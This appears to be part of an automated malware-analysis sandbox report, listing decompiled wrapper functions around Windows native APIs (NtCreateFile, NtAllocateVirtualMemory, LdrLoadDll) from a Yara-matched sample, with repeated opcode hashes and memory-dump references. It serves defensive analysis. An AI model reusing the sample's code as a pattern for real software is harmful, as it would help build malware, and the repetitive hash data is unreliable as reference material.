                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                      • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 68%
                                      			E004185DA(void* __eax, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                      				intOrPtr _v0;
                                      				long _t23;
                                      				void* _t33;
                                      				void* _t37;
                                      				void* _t38;
                                      
                                      				_t38 =  <=  ? _t37 : _t37;
                                      				_push(_t38);
                                      				_push(_t38);
                                      				_t17 = _v0;
                                      				_t3 = _t17 + 0xc40; // 0xc40
                                      				E004191E0(_t33, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                                      				_t23 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                      				return _t23;
                                      			}









                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: ee2b5ba64afc0f84d0141d7c52f8fd841546f9b265e9f1ed23069c6d29bd0d65
                                      • Instruction ID: 6e43e8784cf3705c405577dbee2cb728afe2da6cfb97e368a4996e2c9e1a0fce
                                      • Opcode Fuzzy Hash: ee2b5ba64afc0f84d0141d7c52f8fd841546f9b265e9f1ed23069c6d29bd0d65
                                      • Instruction Fuzzy Hash: DA01A4B2205208ABCB18DF89DC95DEB77ADEF8C754F158248FA0997241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                      				long _t21;
                                      				void* _t31;
                                      
                                      				_t3 = _a4 + 0xc40; // 0xc40
                                      				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                      				return _t21;
                                      			}






                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                      				long _t14;
                                      				void* _t21;
                                      
                                      				_t3 = _a4 + 0xc60; // 0xca0
                                      				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                      				return _t14;
                                      			}






                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 69e71376a6443e8b2eb60897db0d067a831b9c3ddccb42f004c9b901245b1883
                                      • Instruction ID: 8330ba31917084f790ea1425bf210e1738405e84dab5adee885bda4b7ddad8c6
                                      • Opcode Fuzzy Hash: 69e71376a6443e8b2eb60897db0d067a831b9c3ddccb42f004c9b901245b1883
                                      • Instruction Fuzzy Hash: 9190026260100503D21271594404716004AD7D4382F91C1B6A5014555ECA6589E6F171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bfc7307d785cfb93d97547e9e4a8dbd2523ec78489eec87ee2941029dac915e1
                                      • Instruction ID: 845f7406d5add1a3218f28621c93da3167c33cd1bb4585d794ec054096e342a8
                                      • Opcode Fuzzy Hash: bfc7307d785cfb93d97547e9e4a8dbd2523ec78489eec87ee2941029dac915e1
                                      • Instruction Fuzzy Hash: 3C90027220100413D222615945047070049D7D4382F91C5A6A4414558D969689A6F161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9f5136938eb05283d07f51c4cfab349f9d7e0b13d919dfb150ca6c4966c44b71
                                      • Instruction ID: 714a50d4a6e942a44cb19c42eb2479c4ebd5840c7981ffedd23a863876c7ea47
                                      • Opcode Fuzzy Hash: 9f5136938eb05283d07f51c4cfab349f9d7e0b13d919dfb150ca6c4966c44b71
                                      • Instruction Fuzzy Hash: 1A900262242041535656B15944046074046E7E4382791C1A6A5404950C856698AAE661
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7b7b0275314122453e69b04ce0b9fe8929c3f19c5c92c22027c41d513de4422b
                                      • Instruction ID: 4fe3b692b7cb902f1aa06d08552bfd993dab26e60bd7a7057d6fb95c7bc947cc
                                      • Opcode Fuzzy Hash: 7b7b0275314122453e69b04ce0b9fe8929c3f19c5c92c22027c41d513de4422b
                                      • Instruction Fuzzy Hash: 359002A234100443D21161594414B060045D7E5342F51C1A9E5054554D8659CCA6B166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 795d7c73cd91886d4d45f21495d2f1501e697e59765758ae9c107ad7779eaae7
                                      • Instruction ID: 9efc5011c0a063c2e318e23a73d3bc63c1ae30b44c13d603c805e79a40fbc558
                                      • Opcode Fuzzy Hash: 795d7c73cd91886d4d45f21495d2f1501e697e59765758ae9c107ad7779eaae7
                                      • Instruction Fuzzy Hash: BB9002B220100403D251715944047460045D7D4342F51C1A5A9054554E86998DE9B6A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4762c566501cd05674cb7f4649ddfc947e027ff29950426abff504c27fbe8a68
                                      • Instruction ID: f5601d963ada4d841ece04882a299c3c45331edde5ff4d580e352fea839c77df
                                      • Opcode Fuzzy Hash: 4762c566501cd05674cb7f4649ddfc947e027ff29950426abff504c27fbe8a68
                                      • Instruction Fuzzy Hash: 9890026260100043425171698844A064045FBE5352751C2B5A4988550D859988B9A6A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 256a1c1484f2175713d273cabc45dcc3e0bef95379f2fdaa3bbcb0a6238c3cd9
                                      • Instruction ID: 9a55bfebe5a8d754735f135fc6a882413f119c5a2c81b10b5f8e84853abdfd1a
                                      • Opcode Fuzzy Hash: 256a1c1484f2175713d273cabc45dcc3e0bef95379f2fdaa3bbcb0a6238c3cd9
                                      • Instruction Fuzzy Hash: 9E90027220140403D2116159481470B0045D7D4343F51C1A5A5154555D866588A5B5B1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5040131e72b6f5df0f43a7473813fe5a907d09458c29766e6d55feebda01f716
                                      • Instruction ID: 0b9c9212b72373d14ba35a5702cca01865f575f9109163c19cefced9a22f3c1e
                                      • Opcode Fuzzy Hash: 5040131e72b6f5df0f43a7473813fe5a907d09458c29766e6d55feebda01f716
                                      • Instruction Fuzzy Hash: 5290026221180043D31165694C14B070045D7D4343F51C2A9A4144554CC95588B5A561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 29ec1c2d8fac60af3cead5afdd578a1161d67d9d3dfd23f1472e0ccf7b779de3
                                      • Instruction ID: f26e26c56a7ce99ef4dba83db7322943a5a37e7fb6546778795c2b1a6ed46e33
                                      • Opcode Fuzzy Hash: 29ec1c2d8fac60af3cead5afdd578a1161d67d9d3dfd23f1472e0ccf7b779de3
                                      • Instruction Fuzzy Hash: 8B9002A220200003421671594414716404AD7E4342B51C1B5E5004590DC56588E5B165
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3c6277010763791c327baa8eb9792aa7cf7fe14545d9600f321d39c7cfa3cfc8
                                      • Instruction ID: 850e32ade888b9a86e8f8a2be28b9c5f6ec92f743e74c844d93a2f648b5ed76d
                                      • Opcode Fuzzy Hash: 3c6277010763791c327baa8eb9792aa7cf7fe14545d9600f321d39c7cfa3cfc8
                                      • Instruction Fuzzy Hash: 15900266211000030216A55907046070086D7D9392351C1B5F5005550CD66188B5A161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4b814a433ba3cce9d348c848cb818d8c436e9f68fb1c4df0ea2a3374caf00dad
                                      • Instruction ID: b94fa48051c92ac7583e147be2259a87deff5058f498606b71f5bfb4de807170
                                      • Opcode Fuzzy Hash: 4b814a433ba3cce9d348c848cb818d8c436e9f68fb1c4df0ea2a3374caf00dad
                                      • Instruction Fuzzy Hash: 1390027220108803D2216159840474A0045D7D4342F55C5A5A8414658D86D588E5B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 5c24ddeaf74e7344ccc80815ac7bc5f783418e3bd0a7a1403667944653dfbb80
                                      • Instruction ID: bc5cacd025cd5e0ec0b1d696fbdd770d5b44ea96997f860e7ba29c27eed70bcb
                                      • Opcode Fuzzy Hash: 5c24ddeaf74e7344ccc80815ac7bc5f783418e3bd0a7a1403667944653dfbb80
                                      • Instruction Fuzzy Hash: C790027220100803D2917159440474A0045D7D5342F91C1A9A4015654DCA558AADB7E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 28a11c7a951677ae60620fdd7993163bcf38c3e7830c9238d4d1d0fe27c591c9
                                      • Instruction ID: 461f36d2e09070c14cb57cf5fb129837064e982c7cf9cfe39a152bc15e8d5a6c
                                      • Opcode Fuzzy Hash: 28a11c7a951677ae60620fdd7993163bcf38c3e7830c9238d4d1d0fe27c591c9
                                      • Instruction Fuzzy Hash: 1090026230100003D251715954187064045E7E5342F51D1A5E4404554CD95588AAA262
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bc5b5c9517f3d3bd7102296c0cb21f51f014959bb2c9c80d7f3b1ff9596eb51a
                                      • Instruction ID: 5167cc4d01a14b7eed773396f25cdf1651c3e7c1a2c033e48cf79576b45be3c3
                                      • Opcode Fuzzy Hash: bc5b5c9517f3d3bd7102296c0cb21f51f014959bb2c9c80d7f3b1ff9596eb51a
                                      • Instruction Fuzzy Hash: 4090026A21300003D2917159540870A0045D7D5343F91D5A9A4005558CC95588BDA361
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                          void* _t10;
                                          void* _t15;

                                          E004191E0(_t15, _a4, _a4 + 0xc70, *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                          _t6 = &_a8; // 0x413536
                                          _t10 = RtlAllocateHeap(*_t6, _a12, _a16); // executed
                                          return _t10;
                                      }






                                      APIs
                                      • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: 65A
                                      • API String ID: 1279760036-2085483392
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: MessagePostThread
                                      • String ID:
                                      • API String ID: 1836367815-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: LookupPrivilegeValue
                                      • String ID:
                                      • API String ID: 3899507212-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID:
                                      • API String ID: 621844428-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                      Memory Dump Source
                                      • Source File: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f0aa21b2e7506481146878d82c3a5e21000cdb28734b97889d2dabc43dbc140f
                                      • Instruction ID: d4b46479f91a02c0b48cb806b46c9af66dd8daff7b1fefabdd2d78c4b67d1265
                                      • Opcode Fuzzy Hash: f0aa21b2e7506481146878d82c3a5e21000cdb28734b97889d2dabc43dbc140f
                                      • Instruction Fuzzy Hash: 9F90027220100843D21161594404B460045D7E4342F51C1AAA4114654D8655C8A5B561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfce78a6cb825d894055451bd46b7aef6f9a26896673c9628f46f3df493afe46
                                      • Instruction ID: d9cf433a2ef525ce9c6d4f8a790b2fa02a40adbdf78856a8661a053621842f24
                                      • Opcode Fuzzy Hash: cfce78a6cb825d894055451bd46b7aef6f9a26896673c9628f46f3df493afe46
                                      • Instruction Fuzzy Hash: 5090027260500803D261715944147460045D7D4342F51C1A5A4014654D87958AA9B6E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd50d5c735988d0927574dc483bdaef86563b89e99a8e88231bcf99f58f98953
                                      • Instruction ID: 5174ffc059f557eb29f75c00e10ab17229b992f24869818e02b12e198ea8d637
                                      • Opcode Fuzzy Hash: dd50d5c735988d0927574dc483bdaef86563b89e99a8e88231bcf99f58f98953
                                      • Instruction Fuzzy Hash: FC90027220504843D25171594404B460055D7D4346F51C1A5A4054694D96658DA9F6A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e6b83b5bd78f256288b02800c1a2a6a9d3b52c32213422efcf14d0c6f3d001aa
                                      • Instruction ID: 1eb2bc85b919e89ad66fbe18a3fc0195ccd331b9e0891d35cc442668b07044b8
                                      • Opcode Fuzzy Hash: e6b83b5bd78f256288b02800c1a2a6a9d3b52c32213422efcf14d0c6f3d001aa
                                      • Instruction Fuzzy Hash: 3290026260500403D251715954187060055D7D4342F51D1A5A4014554DC6998AA9B6E1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f81e6f6e7f2946094fa4123ecc3e9e2f34450d50351b870b3c31f94cf1ca127
                                      • Instruction ID: 1f696efe9bc822de70bfd8d390cc936d1ec454605328d86aa989b85279dbda81
                                      • Opcode Fuzzy Hash: 9f81e6f6e7f2946094fa4123ecc3e9e2f34450d50351b870b3c31f94cf1ca127
                                      • Instruction Fuzzy Hash: 5D900272301000539611A6995804B4A4145D7F4342B51D1A9A8004554C859488B5A161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eb74969f1520ba707c7803b85fd6ade7e68cf8c28add97533ac35549222b0af1
                                      • Instruction ID: cb32241e3627a2724e872aef93e050c48cf0707fdf6b6503931c463298fe52bf
                                      • Opcode Fuzzy Hash: eb74969f1520ba707c7803b85fd6ade7e68cf8c28add97533ac35549222b0af1
                                      • Instruction Fuzzy Hash: D190026220504443D21165595408B060045D7D4346F51D1A5A5054595DC67588A5F171
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5dfb7509ba829dd3d8b98ae7a172c9878acf528e4428d3ff4f9bab33cc89bb05
                                      • Instruction ID: bebdf5f5995abb9c64003e24d6a78dbe5e02dc7a0711e7508b7365689baea232
                                      • Opcode Fuzzy Hash: 5dfb7509ba829dd3d8b98ae7a172c9878acf528e4428d3ff4f9bab33cc89bb05
                                      • Instruction Fuzzy Hash: 9790027620504443D61165595804B870045D7D4346F51D5A5A441459CD869488B5F161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 403780bb7cbfdeb3f155fa056a8280bfaf327d03ac7696d3dbeff6b04c7fcc9f
                                      • Instruction ID: ea2fe9ecd29ab573c1b1da8aba62633c24f50932d1e001014f1363208ee79b96
                                      • Opcode Fuzzy Hash: 403780bb7cbfdeb3f155fa056a8280bfaf327d03ac7696d3dbeff6b04c7fcc9f
                                      • Instruction Fuzzy Hash: A890027220100403D211615955087070045D7D4342F51D5A5A4414558DD69688A5B161
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.361845075.0000000000AE0000.00000040.00000001.sdmp, Offset: 00AE0000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
